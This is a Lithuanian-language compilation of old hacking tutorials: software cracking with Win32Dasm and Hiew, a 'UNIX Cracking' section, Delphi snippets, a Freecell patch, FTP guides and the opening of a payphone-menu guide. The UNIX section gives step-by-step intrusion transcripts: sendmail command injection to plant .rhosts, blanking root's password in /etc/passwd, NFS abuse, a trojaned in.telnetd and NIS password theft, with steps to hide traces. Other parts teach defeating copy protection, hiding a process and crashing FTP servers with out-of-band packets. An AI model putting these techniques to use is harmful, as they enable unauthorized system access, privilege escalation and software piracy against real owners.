Jusu atveju skaicius bus aisku kitoks, bet bendras vaizdas turi buti panasus. Susirade tai, paspauskite Goto(Win32Dasm virsuje), atsiradusiame meniu pasirinkite Goto Code Location ir parasykite si skaiciu, mano atveju tai 00410545 ir spauskite OK. Taigi jus vel kazkur nusokote, dabar nejudedami is vietos, nusirasykite skaiciu esanti Win32Dasm apacioje, kuri atrodo taip (isskyrus skaiciai):
Line:34040 Pg 401 of 409 Code Data @:0041052F @offset 0000F945h in File:
Vienintelis dalykas kurio mums reikia tai skaicius einantis po @offset, ne po @ bet po @offset na tik -h-nebereikia. Taigi mano atveju man bus reikalingas 0000F945 skaicius, jusu atveju, kitas(jau kartoti atsibodo) taigi dabar nusirase si skaiciu, paliekame Win32Dasm ir einame dabar prie HIEW. Hiew’e pasirenkame mus reikalinga EXE faila. Dabar spaudziame F4 ir pasirenkame Decode, paskui seka F5 paspaudimas. Taigi dabar parasome musu skaiciu, mano atveju, kaip zinome yra 0000F945 Dabar spaudziame enter, ir BOOM mes toje vietoje kur ir norime buti. Bet dabar as jums noriu pasakyti pagridndinius asemblerio kalbos JUMPUS:
ASM. —Ka reiskia
—————————————————————-
jne —Ivyksta suolis jei nelygu
je —Ivyksta suolis jei lygu
jmp —Bet kokiu atveju ivyksta suolis
nop —Nieko neatlieka(no operation)
ja —Ivyksta suolis jei virsuje
jna —Ivyksta suolis jei nevirsuje
jae —Ivyksta suolis jei virsuje arba lygu
jnae —Ivyksta suolis jei nevirsuje arba lygu
jb —Ivyksta suolis jei zemiau
jnb —Ivyksta suolis jei nezemiau
jbe —Ivyksta suolis jei zemiau arba lygu
jnbe —Ivyksta suolis jei nezemiau arba lygu
jg —Ivyksta suolis jei didesnis
jng —Ivyksta suolis jei nedidesnis
jge —Ivyksta suolis jei didesnis arba lygu
jnge —Ivyksta suolis jei nedidesnis arba lygu
jl —Ivyksta suolis jei mazesnis
jnl —Ivyksta suolis jei nemazesnis
jle —Ivyksta suolis jei mazesnis arba lygu
jnle —Ivyksta suolis jei nemazesnis arba lygu
—————————————————————-
Zinoma as suprantu, tai gali atrodyti is pradziu keblu, as pamenu, kai pats pirma karta tai pamaciau, O dieve galvojau, ir ka as cia bandau ismokti :)), bet kaip sakant kas bando tam ir pavyksta. Bet dabar jums tereikia pakeisti: Jei dydesnis, tai keiciate i Jei nedidesnis, tai yra jei yra JNE keiciate i JE ir atvirksciai, o linksmiausia dalis tame, kad netgi daugelis programu yra apsaugotos tokiu budu:). Taigi as dabar stoviu:
0000F945: 751D jne 0000F964
Taigi kaip jau supratote man reikia pakeisti, JNE i JE . Dabar jus pasakysite:”Na tai kas, kad as zinau ka i ka reikia keisti, bet KAIP man tai padaryti???” Taigi sakau reikia paprasciausiai pakeisti viena skaiciu, vienu daugiau arba vienu maziau. Taigi pas manes yra skaicius 751D ir JNE. Norint is JNE padaryti JE as turiu pakeisti 751D i 741D. O jei butu pas manes JE tai tureciau atvirksciai ne atimti, bet prideti prie 5 . Kartais buna, kad reikia isviso panaikinti operacija taigi, parasydami NOP vietoj JNE ar kas bebutu, tai darome parasydami 90 beje, jei jau mes turime atjungti operacija(NOP), tai isidemekite, kiek skaiciu turi ta eilute, Win32Dasme ant kurios mes stovejome, kai atlikome funkcija Go to code location isidemekite antra skaiciu is kaires, toje eiluteje kur stovite. Jei skaicius pavyzdziui yra 751D tai ji keiciame 9090, jei 751D000000 tai ji turime pakeisti i 9090909090 vienu zodziu turime pakeisti skaiciu i skaiciu. Beje kai Hiew’e jus rasysite 90 nekreipkite demesio, kad eilute nusoka, paprasciausiai surasykite tiek 90 kiek reikia ir viskas.
Norint kad mums leistu keisti kanors, paspauskime F3 ir galime irasineti, o kai baigsite rasyti , tai paspauskite F9 – uzfiksavimui ir F10 – isejimui, ir viskas. Kartais buna, kad neiseina ne vienas auksciau isvardytas variantas. Tada paprasciausiai susirasykite visu JUMP’u @offset numerius einancius nuo zinutes i virsu ir juos keitaliokite, juk niekada negali buti uztikrintas kuris JUMP’as reikalingas.
PS: shis tutorialas yra sudetas ish keliu ir viskas surishta mano pachio mintimis;)
10. UNIX Cracking
Pvz No1.
crack% telnet target.remote.com 25
Connecting to 123.456.654.321.
! prisijungiam prie 25 porto – tai SMTP
220 sendmail SMI/4.3.5.2 ready
! versija kaip zhinome turi buga.
helo xxx
220 Helo xxx, ( crack.edu )
mail from: |echo crack.edu/.rhosts@target.remote.com
! statome komanda vietoj atgalinio adreso.
200 Sender ok.
rcpt to: nosuchuser
! ivedam ishanxto neteisinga adresata
500 nosuchuser: user unknown
! nekreipdami demesio i praneshima tesiame dialoga .
dataŽ
230 Enter mail, end with .
200 Mail accepted
! viskas mashina nulauzhta..
quitŽ
crack% su
! dabar ilendam taip kad musu nebutu matyti per who
# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#
Pvz No2.
crack# su – bin
$ rsh target.remote.com /bin/csh -i
! Faile /etc/hosts.equiv yra uzhrashas + ir klaida.
Welcome to remote.com!
! Katalogas /etc su savininku bin.
Warning! No access to terminal, job control disabled!
% ls -ldg /etc
drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/
% cd /etc
! Darom kad mums galima butu editinfi passwd .
% mv passwd passwd.was
% cp passwd.was passwd
! redaguojam
% ed passwd
2341Ž
1p
root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh
s/Nkkh5gkljGyj//p
root::0:0:Root:/:/bin/csh
w
2341
q
! Ir super useryje.
%echo /bin/csh -i | su root
Warning! No access to terminal, job control disabled!
target# mv /etc/passwd.was /etc/passwd
! Kad niekas nepastebetu ka mes dareme.
Pvz No3.
crack% showmount -e target.remote.com
Export list for target.remote.com
/home Everyone
/disk3 neptun pluton alpha
! Domeininej katalogaj prieinami per NFS
crack% su
# mount -t nfs target.remote.com:/home /mnt
# cd /mnt
! Mountinam kataloga sau
# ls -ldg *
drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/
# echo crack.eduŽ user/.rhosts
! Idiegiam .rhosts pas pas userius
# catŽ /etc/passwdŽ
user::257:20::/:
^DŽ
! sukuriam toki pati pas mumi
# su – userŽ
! Tampam juo
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
!Ir einam i svechius -)
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
! Katalogas prieinamas writinimuj
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
!Radom programike kuri pasileis
!per roota ish musu katalogo
% cd /usr/etc
% mv in.telnetd in.telnetd1
! sukuriam trojana
% catŽ in.telnetd
#!/bin/sh
exec /bin/csh -i
^D
% chmod 755 in.telnetd
! ir paleidzhiam ji
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
# chown user /etc;
! Darom /etc savu
^M: command not found
# exit;
^M: command not found
Connection closed by foreign host.
% cd /etc
! o toliau kaip in Pvz No1.
....
Pvz No4.
! chekinam ar yra NIS Ž
crack% rpcinfo -p target.remote.com | grep bind
120000 2 udp 2493 ypbind
! yra toxaj ..
crack% ypx -o target.passwd -g target.remote.com
! pasimam paswordu faila
crack% crack target.passwd
! leidzhiam passwd ieshkokli
[ a lot of time ]
OK, user user has password iamuser
! radom, uzheinam
crack% telnet target.remote.com
! toliau viska kaip kad prieshtai buvusiam pvz .
..
– Hex –
(imti pvz, versta, kurta , bla bla bla rezultatas priesh akis)
Shitie budai yra pakankamai seni ir vieni ish primytiviausiu bet . heh
susipazhinkit su principu nes yra tokiu kurie net neisivaizduoja kaip yra
daromi tokie darbai ir uzhduoda tokius klausimus . mazhdaug su kokia
programele tu crackini ? ;
Informacion rulez and if u rule information ...
11. Delphi
Sios komandos skirtos programavimo kalbai – Delphi. Jos isbandytos su
5.0 versija.
..by ZErOnE
zerone@xxx.lt
______________________________________________________________________
1. Shut Down, Reboot, Standby funkcijos:
ExitWindowsEx(EWX_SHUTDOWN,0); { ShutDown }
ExitWindowsEx(EWX_REBOOT,0); { Reboot }
ExitWindowsEx(EWX_POWEROFF,0); { Standby }
______________________________________________________________________
2. Gauti pc IP adresa:
uses winsock;
.
function GetIPAddress: string;
var
phoste:PHostEnt;
Buffer:array[0..100] of char;
WSAData:TWSADATA;
begin
result:=”;
if WSASTartup($0101, WSAData) <> 0 then exit;
GetHostName(Buffer,Sizeof(Buffer));
phoste:=GetHostByName(buffer);
if phoste = nil then
begin
result:=’127.0.0.1′;
end
else
result:=StrPas(inet_ntoa(PInAddr(phoste^.h_addr_list^)^));
WSACleanup;
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
Label1.Caption:=GETIPAddress;
end;
______________________________________________________________________
3. Gauti win’u ir system foldery:
function GetWinDir: String;
var
dir: array [0..max_path] of char;
begin
GetWindowsDirectory(dir, max_path);
result:=StrPas(dir);
end;
function GetSysDir: String;
var
dir: array [0..max_path] of char;
begin
GetSystemDirectory(dir, max_path);
result:=StrPas(dir);
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
label1.caption:=GetWinDir;
label2.caption:=GetSysDir;
end;
______________________________________________________________________
4. Sisteminiu klavisu isjungimas/yhungimas (Alt+Tab, Alt+Ctrl+Del) :
var OldVal: LongInt;
begin
SystemParametersInfo (97, Word (True), @OldVal, 0); //disable
SystemParametersInfo (97, Word (False), @OldVal, 0); //enable
end;
______________________________________________________________________
5. Pakeisti background’a :
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, PChar(‘C:pvz.BMP’), SPIF_SendWININICHANGE);
______________________________________________________________________
6. Pakeisti peles pozicija :
SetCursorPos(600,600);
______________________________________________________________________
7. Gauti ScreenShot’a :
function GetScreenShot:TBitmap;
var
Desktop:HDC;
begin
Result:= TBitmap.Create;
Desktop:= GetDC(0);
try
try
Result.PixelFormat:=pf32bit;
Result.Width:=Screen.Width;
Result.Height:=Screen.Height;
BitBlt(Result.Canvas.Handle,0,0,Result.Width,Result.Height,Desktop,0,0,SRCCOPY);
Result.Modified:=True;
finally
ReleaseDC(0,Desktop);
end;
except
Result.Free;
Result:=nil;
end;
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
Image1.Picture.Bitmap:=GetScreenShot;
end;
______________________________________________________________________
8. Darbas su .ini failais :
uses inifiles;
.
var ini: TIniFile;
.
var reiksme1:string; {nuskaitymas}
begin
reiksme1:=ini.ReadString(‘Section’,’Edit1′,”);
label1.caption:=reiksme1;
end;
ini.WriteString(‘Section’,’Edit1′,edit1.text); {yrasimas}
procedure TForm1.FormCreate(Sender: TObject);
begin
ini:= TIniFile.Create(‘c:test.ini’); {.ini failo sukurimas}
end;
______________________________________________________________________
9. Enable/Disable Start mygtuko :
EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), TRUE); {enable}
EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), FALSE); {disable}
______________________________________________________________________
10. paslepti/grazinti desktop’a :
ShowWindow(FindWindow(nil,’Program Manager’),SW_HIDE); {paslepti}
ShowWindow(FindWindow(nil,’Program Manager’),SW_SHOW); {grazinti}
______________________________________________________________________
11. Programos paslepimas :
const
RSP_SIMPLE_SERVICE = 1;
RSP_UNREGISTER_SERVICE = 0;
var
function RegisterServiceProcess(dwProcessID, dwType: DWord):
DWord;stdcall;external ‘Kernel32.dll’ name ‘RegisterServiceProcess’;
{Ushsidek taimeri su intervalu 1}
procedure TForm1.Timer1Timer(Sender: TObject);
begin
Timer1.Enabled := False;
Form1.Visible := False;
RegisterServiceProcess(GetCurrentProcessID,RSP_SIMPLE_SERVICE);
Brush.Style := bsClear;
end;
{o kai uzdarysi forma daryk taip:}
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
RegisterServiceProcess(GetCurrentProcessID,RSP_UNREGISTER_SERVICE);
end;
_______________________________________________________________________
12. Kopijuoti/Perkelti/Trinti folderius :
uses shellapi
.
function copydir(von,zieldir: String): boolean;
var fos: TSHFileOpStruct;
begin
ZeroMemory(@fos, SizeOf(fos));
with fos do begin
wFunc := FO_COPY;
fFlags := FOF_FILESONLY;
pFrom := PChar(von+#0);
pTo := PChar(zieldir)
end;
Result:=(0=ShFileOperation(fos));
end;
function movedir(von,zieldir: String): boolean;
var fos: TSHFileOpStruct;
begin
ZeroMemory(@fos, SizeOf(fos));
with fos do begin
wFunc := FO_MOVE;
fFlags := FOF_FILESONLY;
pFrom := PChar(von+#0);
pTo := PChar(zieldir)
end;
Result:=(0=ShFileOperation(fos));
end;
function deldir(dir: String): boolean;
var fos: TSHFileOpStruct;
begin
ZeroMemory(@fos, SizeOf(fos));
with fos do begin
wFunc := FO_DELETE;
fFlags := FOF_SILENT or FOF_NOCONFIRMATION;
pFrom := PChar(dir+#0);
end;
Result:=(0=ShFileOperation(fos));
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
if copydir(‘c:mp3′,’c:xxx’)=true then
begin
ShowMessage(‘Dir copied.’);
end;
end;
______________________________________________________________________
12. Freecell for Windows 98 SE krekinimas
Info:
Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)
Irankiai: SoftICE, Betkoks šešioliktainis redaktorius (http://ucol.home.lt/cgi-bin/ucol.pl?l_tools)
Taikinys: Žaidimas „Freecell“
Intro:
Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti :]
Kam gi reikia krekinti „Freecell“? Jeigu žaidžiame šį žaidimą ir mums niekaip nesiseka jį sužaisti, taigi mes norime iš jo išeiti ir vėl pradėti iš naujo, bet išeinant pamatome dialogą: „Are you sure you want to quit this game?“. Jeigu spaudžiame „Yes“, tai mums užskaitomas pralaimėjimas, o mes to visai nenorime :] Todėl reikia padaryti, kad tas dialogas visai neiššoktų ir nebūtų užskaitytas pralaimėjimas.
Pora sakinių:
Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, šešioliktainius redaktorius ir assembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.
Suderinimas:
SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.
Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):
.
INIT=”CODE ON; X;”
.
EXP=c:windowssystemkernel32.dll
EXP=c:windowssystemuser32.dll
EXP=c:windowssystemgdi32.dll
.
Kombinacijos:
Ctrl+D – įeiti į SoftICE;
F5 – įšeiti iš SoftICE;
F10 – vykdyti programą po vieną eilutę;
F8 – jeigu esame ant procedūros, įeiti į ją.
Krekinimas:
Jūs laisvai galite nukrekinti ir „Freecell“ iš windows 95, ten viskas labai panašu, nes kiek žiūrėjau failų dydžiai skiriasi tik keliais baitais.
Įeiname į žaidimą (StartProgramsAccessoriesGamesFreecell). Paleidžiame jį (GameNew Game). Bandome išeiti iš jo. Pamatome dialogą: „Are you sure you want to quit this game?“. Spaudžiame „No“ (juk nenorime pralaimėti :)). Einame į SoftICE (Ctrl+D). Rašome: bpx messagebox. Išeiname iš SoftICE (F5). Vėl bandome išeiti. Aktyvuojasi SoftICE. Spaudžiame F11 (išėjimas iš proceduros). Pasirodo dialogas. Spaudžiame „No“. Vėl aktyvuojasi SoftICE. Štai ką matome:
.
:03D8 68D604 push ds ;dialogo parametras
:03DB 1E push 56c ;dialogo parametras
:03DC 686C05 push ds ;dialogo parametras
:03DF 6A24 push 24 ;dialogo parametras
:03E1 9A00009717 call user!messagebox ;iškviečiame dialogą
:03E6 3D0700 cmp ax,0007 ;ar buvo paspausta „No“
:03E9 0F846E04 jz 085b ;jeigu paspaudėme „No“ nedarom nieko
:03ED E8FE1A call 1eee ;užskaitome pralaimėjimą
:03F0 E80734 call 38ca ;užskaitome pralaimėjimą
:03F3 E9BFFE jmp 02b5 ;nošokame į išėjimą
.
Užsirašome pilkai pažymėtys baitus (68D6041E686C056A24). Jų mums prireiks vėliau. Taigi mums reikia praleisti dialogą ir pralaimėjimo užrašymą ir iš karto nušokti į išėjimą. Tuo mums puikiai pasitarnauja pirmasis dialogo parametras, kuris užima tiek baitų kiek ir išėjimo komanda (jmp 02b5). Todėl tą dialogo parametrą (push ds) reikia pakeisti komada jmp 02b5. Rašome: bpx 3d8. Tai reiškia, kad SoftICE sustos toje vietoje, kai bus bandoma užkrauti pirmą dialogo parametrą. Išeiname iš SoftICE (F5). Bandome išeiti iš žaidimo. Aktyvuojasi SoftICE ties pirmu dialogo parametru. Rašome: a (tai reiškia, kad mes pakeisime komandą push ds kita). Dabar rašome jmp 02 b5 (keičiame komandą). Spaudžiame Enter, paskui Escape. Štai ką matome:
.
:03D8 E9DAFE jmp 02b5 ;nošokame į išėjimą
:03DB 1E push 56c
:03DC 686C05 push ds
:03DF 6A24 push 24
:03E1 9A00009717 call user!messagebox
:03E6 3D0700 cmp ax,0007
:03E9 0F846E04 jz 085b
:03ED E8FE1A call 1eee
:03F0 E80734 call 38ca
:03F3 E9BFFE jmp 02b5
.
Pasikeitė trys baitai, užsirašome raudonai pažymėtus (pasikeitusius) baitus (E9DAFE). Išeiname iš SoftICE (F5). Kartu su SoftICE užsidarė žaidimas ir nebuvo jokio dialogo. Einame į šešioliktainį redaktorių, atidarome faila freecell.exe, vykdome paiešką pagal pilkai pažymėtus užsirašytus baitus. Suradę juos, tris pirmus pakeičiame į raudonai pažymėtus užsirašytus baitus (E9DAFE), išsaugome failą. Išeiname iš šešioliktainio redaktoriaus.
Pabaiga:
Viskas žaidimas „nukenksmintas“. Pabandykite paleisti jį, šiek tiek jame pažaisti ir išeiti. Ką matote? Jokio dialogo išeinant! Vėl įeiname į žaidima, pažiūrime į rezultatus. Rezultatai tokie patys, pralaimėjimas neužskaitytas! Bet žaidimas iki galo dar nenukrekintas, nes dialogas atsiranda vykdant žaidimo meniu komandą „GameNew Game“ antrą kartą. Šitą dialogą pabandykite nukrekinti patys.
13. Domenas dykai
Nemokamos domainu dalintojos namezero hakas
Turbus daugelis zinot kompanija namezero
http://www.namezero.com
kuri nemokamai jums duoda domaina (com, net, org). Bet yra trukumas- ji jusu puslapio apacioje padaro frame`a, kuris gadina visa vaizda.
Pabandykime pagalvoti kaip jis padaro sita visa mesla. As manau jis daro taip: sukuria html dokumenta, kuris suskirstytas i du frame`us, kuriu vienas ira jusu svetaines tikrasis adresas, kitas namezero reklama.
Pasirodo to galima isvengti. Kaip taipadaryti?
I pagalba ateina JavaScript: jus savo puslapio titulineme dokumente iterpete JavaScript`uka, kuris jusu frame`a sulauzo, t.y. padaro per visa page`a. stai kaip atrodo sitas scriptas:
<script language=”JavaScript”>
<!– Slepeme nuo narsykliu, kurios nesupranta JavaScript
// Copyright © 2000 uid=o
// Created by SaTaN
//www.zemrsn.lt/uid0
if (self.parent.frames.length != 0)
self.parent.location=”index.html”;
//vietoj index.html galite/privalote rasyti jusu norima dokumenta, kuri suaktyvinus dingsta visi frame`ai
// –>
</script>
Kuo sitas budas yra blogas?
Nevisos narsykles supranta Javasript ir nevisi narsykleje JavaScript yra ijunge.
Beto jei jus norite issivaduoti tik is to namezero frame`o, o kitus, savo puslapio frame`us paliktitai jums neisdeks.
Iseitis: nenaudokite savo puslapyje frame`u arba padarykite izangini puslapi i jusu frame`ini puslapi, kureme ir bus visas frame`u zydymas.
Demonstracija viso sito galite pamatyti cia:
http://www.userid0.org
Tai yra uid=0 domainas, su nukilintu frame`u.
-=Visa sitai nera versta, kopijuota ar kitai pasisavinta is kitu dokumentu, saitu. Visa tai tik uid=0 sugalvota=-
14. FTP totorial`as
FTP (file transfer protocol)- failu perdavimo protokolas. Naudojantis siuo protokolu galima ivairia informacija failu pavidalu perduoti is vieno kompiuterio i kita, nepriklausomai nuo atstumo tarp kompiuteriu ar ju operaciniu sitemu. Tai vienas is budu perkelti jums reikalinga informacija is kito kompiuterio i savaji ir atvirksciai.
-= FTP reikalingas: =-
Padeti sureguliuoti failu (programu arba/ir duomenu) paskirstyma
Suteikti galimybe tiesiogiai ar netiesiogiai naudotis sistemos resursais
Apriboti vartotojo is kitos sistemos navigacija nutolusioje sistemooje
Efektyviai ir patikimai perduoti duomenis isvienos sistemos i kita
Failu perdavima is vienos sistemos i kita relizuoja dvi programos, naudojancios FTP protokola: programa-serveris, kuri veikia tolimoje sistemoje, ir programa-klientas, kuri aptarnauja norincius pasiimti/duoti failus tolimai sistemai.
Programa-serveris laukia uzklausos ir po to specialiu protokolu realizuoja failu siuntima is/i tolimos sistemos i/is prisijungusiji kompiteri ir taip pat aptarnuoja programa-klienta, t.y. priima ir siuncia specialias ftp komandas.
Programa-klientas prisijungia prie tolimos sistemos, siuncia failus is/i tolima sistema, kuria patogia (arba ne) vartotojo aplinka ir dialogus su vartotoju, transformuoja vartotojo komandas i standartinu ftp komandu seka ir perduoda ja kaip uzklausa ar atsakyma i uzskausa programai-serveriui.
Prisijunge prie tolimos sistemos, jus igaunate dauguma teisiu, kurias turetumete, jei naudotumetes TELNET (aisku prgramu vykdyti ar tikrinti pasto etc neiseis). Bet jus galesite trinti, perkelti, kopijuti etc failus (aisku jei jus turesite tam tikrus leidimus). Jusu teises priklauso nuo sistemos konfiguracijos ir aisku jusu vartotojo vardo (USERNAME).
Prisijungus prie kokio tai FTP serverio jus turite prisistatyti, t.y. nurodyti savo vartotojo varda (username) ir slaptazodi (password). Dauguma serveriu leidzia prisijungti su Anonymouse ar ftp vartotojo vardu (kur password buna jusu email). Tada jusu teises priklauso nuo serverio admino, bet dazniausiai jus tegalite failus tik parsiusti (kartais leidziama ideti failus i incoming kataloga).
Jei naudojates ne visualiu ftp klientu, tai jums reikes zinoti keleta komandu:
pwd – Parodo kokiame kataloge yra siuo metu vartotojas (t.y. jus)
cd – Keicia kataloga, kuriame jus esate
mkdir – Sukuria kataloga
rmdir – Istrina kataloga.
rename – Pervardina faila.
delete – Be komentaru
get – Parsiunce faila is tolimos sistemos i jusiske
put – Siunce faila is jusu sistemos i tolima
FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.
FTP exploitus gali rasti siuose saituose:
http://cert.org
http://www.iss.net/cgi-bin/xforce/xforce_index.pl
http://packetstorm.genocide2600.com
http://www.rootshell.com
http://www.slashdot.org
15. FTP Tutorial 2
DIDELIS FTP TUTORIALAS NAUJOKAMS IR NE TIK
=====================================================================
Sveiki, shiame tekste aprasysiu, kas yra FTP, kam jis naudojamas, keleta terminu ir siaip idomiu dalyku. Pirmiausia, tai jei tau yra labai nepatogu skaityt si teksta (ar kitus) kur reikia vazinet tai i kaire, tai i desine, tai tai yra todel, kad pas tave nepadarytas word wrap. Ji gali padaryt edit/word wrap.
DISKLEIMERIS:
=====================================================================
Man yra visiskai nesvarbu, ka tu darysi paskaites si teksta, bet jei padarysi ka nors negero kaltink tik pats save, nes as ji rasiau tik tam, kad galetum apsisviest. >)
=====================================================================
TURINYS:
=====================================================================
1.0–Kas yra FTP ir kuo jis yra geras
2.0–FTP komandos
3.0–FTP hacking’as
4.0–Keletas FTP bugu
5.0–Keletas terminu naujokams
=====================================================================
1.0 :
FTP (file transfer protokal) lietuviskai butu failu siuntimo protokolas. FTP serveriai leis tau ieiti su User Anonymous, o vietoj passwordo reikes irasyt savo e-maila. Aisku, jei tu turi useri ir zinai user passworda, tai geriau jungtis taip. Jei pasijungsi su Anonymous, tai tu turesi tik read-access. Taip pat galesi matyt tik labai ribota kieki failu. Jei turi ten useri, tai turetum turet tada ir write-access. Tuomet galetum matyt visus isskyrus root-accsess fileus. FTP yra labai geras dalykas, nes kai prisijungi prie FTP serverio, po ji gali vaiksciot kaip po savo kompa. Windowsams labai gera programa yra WS_FTP, nes ji labai patogi valdyti, ir langas, kuriame matai FTP serverio kompa bus panasus i Norton Commander langa. WS_FTP gali atsisiut is www.tucows.com arba kiek zinau ji yra ir mail.tiltas.lt FTP serveryje. FTP naudoja 21 porta.
=====================================================================
2.0 :
Jei prie FTP servo jungies per DOS ar UNIX komanda FTP, tai tada turesi rinkt keleta tokiu komandu, jei noresi paziuret, nusiust ar atsisiut failus:
cd kaip ir UNIXe ar DOSe ji keicia direktorijas (folderius) kompe, kuriame esi
lcd ji keicia tavo kompe direktorijas
dir/ls parodo direktorijas ir failus, kurie yra direktorijoj kurioj esi
get atsisiuti faila
mget atsisiusti daug failu
put nusiusti faila
mput nusiusti daug failu
pwd paraso, kurioje direktorijoj tu esi
=====================================================================
3.0 :
FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.
FTP exploitus gali rasti siuose saituose:
cert.org
www.iss.net/cgi-bin/xforce/xforce_index.pl
packetstorm.genocide2600.com
www.rootshell.com
www.slashdot.org
Sie saitai nera illegalus. Jie yra legalus ir jie paprasciau paaskina, kokios skyles gali buti jusu kompe ir panasiai.
Taip pat gali subscribeintis bugtraqe. Cia yra labai gera konferencija, tiems, kas domisi OS, ir programu exploitais, bugais. www.securityfocus.com
Siuose saituose tau reiktu ieskoti zodziu, tai yra OSu, programu. Pvz.: pasijungiu prie servo, ir matau, kad jis naudoja Mandrake Linux. Tada eini i kuri nors is isvardintu saitu, ir i searcha (ar kur kitur) Mandrake Linux 2.2.13. Tada ten gaunat keleta exploitu ir galbut iseis jums gauti root access!!! Bet aisku turbut apie tai tik svajot. Nu nesvarbu. Jei nori suzinot FTP servo naudojama OS, bandyk jungtis su telnet’u per porta 21, 22, 23, 25. Ir panasiai. Taip pat per 25 porta jei iseis pasijungt, tai suzinosi ir naudojama Send-mail programa. O kaip zinoma, send-mail programos turi ivairiu exploitu.
=====================================================================
4.0 :
Keletas siu bugu yra paprastos padarytos klaidos, ir jie nera kokie nors fantastiski. Jie cia yra surasyti tik tam, kad tu jei esi naujokas, galetum susipazinti su keletu exploitu.
Sie bugai yra paimti ne is kokiu nors dideliu hacking saitu, o is paprastu homepageu, kurie pamoko, kaip savoj sistemoj istaisyt klaidas.
1-bugas. FTP Bounce Attack (jis yra per ilgas, nueik i http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425)
2-bugas. Bet kas is isores galetu isjunkt FTP serveri. Ir jei dar FTP servas naudoja win 3.1 systema tikrai nusicrash’ins.
Programa: WinQVT/NET (tinka visos versios)
Exploitint: paprasciausiai issiusk OOB (Out of Band) i porta 21.
Kaip ji exploitint naujokams, ar tiems kurie tingi kaip nors vienaip ar kitaip terliotis: Su bet kokiu winnuke reikia issiust ta packeta (ar ka ten siuncia nukeas) ne i 139 porta, bet i 21 porta. Sis budas turetu tikrai suveikt ant win 3.1 ir kazka girdejau, kad WIN NT 4.0 turi ta pati bug’a.
Taip pat, kai pasijungi prie FTP servo su telnet, DOS, ar UNIX, pabandyk surinkt SYST komanda. Tau tada turetu ismest idomios informacijos apie ta kompa, tai yra: OS, bei info apie FTP serva.
=====================================================================
5.0 :
1. Daemon – programa, kuri klauso, ar niekas nesijungia per koki nors porta, ir jei jungiasi, bendrauja su tuo, kas jungiasi.
2. Root – Useris, kuris UNIXe gali daryti VISISKAI KA NORI. Tai yra, jis gali keist kitu user’iu passwordus, kreatint naujus userius, trint ka tik nori, ir pan. pan.
3. Flames – kai ant kieno nors varai, tai yra vadini ji visokiu daunu, lochu, debilu, gejum ir pan. Flameinama paprastai per e-maila.
4. ISP – Internet service provider. Jei nesupranti angliskai, tai Interneto rysio tiekejas.
5. Read-access, write-access ir pan. – tai tam tikri tavo veiksmu apribojimai. Jei turi read-access, tai gali tik skaityti ir atsisiusti, ir tai ne visus failus. Jei turi write-access, tai gali irasyti i sistema ka nori, bet negali daryti ka nori. Root-access gali daryti KA TIK NORI.
=====================================================================
Laukite sio texto papildymo.
Si texta rase spadofora. Ate
Iki pasimatymo NETE!
2000.05.21 17:05
16. Taksofonai zhaliems
Visishko idioto ivadas i praktine telefonija
“TAKSOFONAI ZHALIEMS”
Parenge: ww0lf
1999, Kaunas
Ishpostinus cyberia/MG failiuka apie taksofonu “Pulsar-50” meniu, susilaukeme
didelio demesio ir labai daug klausimu, kas ten yra kaip 🙂
Pavarges atsakineti i klausimus, nutariau parashyti kiek ishsamesni teksta
shia tema. Taigis.
Shiuo metu Lietuvoje labiausiai paplite yra “Pulsar-50” taksofonai, liaudyje
vadinami “czipiniais”. Daugelis vartotoju linke naudotis jais kaip nurodo
“Lietuvos telekomo” instrukcija. Ir mazhai kas zhino, kad shis taksofonas –
tai mazhytis kompiuteris, kuri galima konfiguruoti, aktyvuoti vienas ar
kitas funkcijas ir gauti ish jo aibe naudingos informacijos. Taksofonas
valdomas per meniu, labai panashu i mobiliuju telefonu meniu, ir jeigu
jums kada teko naudotis mobiliaku, jus visai nesunkiai susigaudysite.
Visa informacija taksofone pateikiama dvieju eilucziu skystuju kristalu (LCD)
ekrane (tame pacziame, kuriame jus matote jusu renkama numeri ir kiek jums
liko kreditu). Musu tekste mes vaizduosime tai, ka jus matote ekrane
kvadratiniuose skliaustuose, pvz:
[IDEKITE KORTELE ARBA]
[NEMOKAMAS NUMERIS ]
Tai, ka jus renkate taksofono klaviaturoje, vaizduosime figurinese
skliaustuose, pvz:
{8191} – reishkia suspaudzhiame mygtukus 8 1 9 1
Paaishkinimas visishkam idiotui: klaviatura – tai taksofono mygtukai. 🙂
Taigi.
I meniu ieinama ivedus PIN koda , kurio uzklausimas pasirodo taksofono
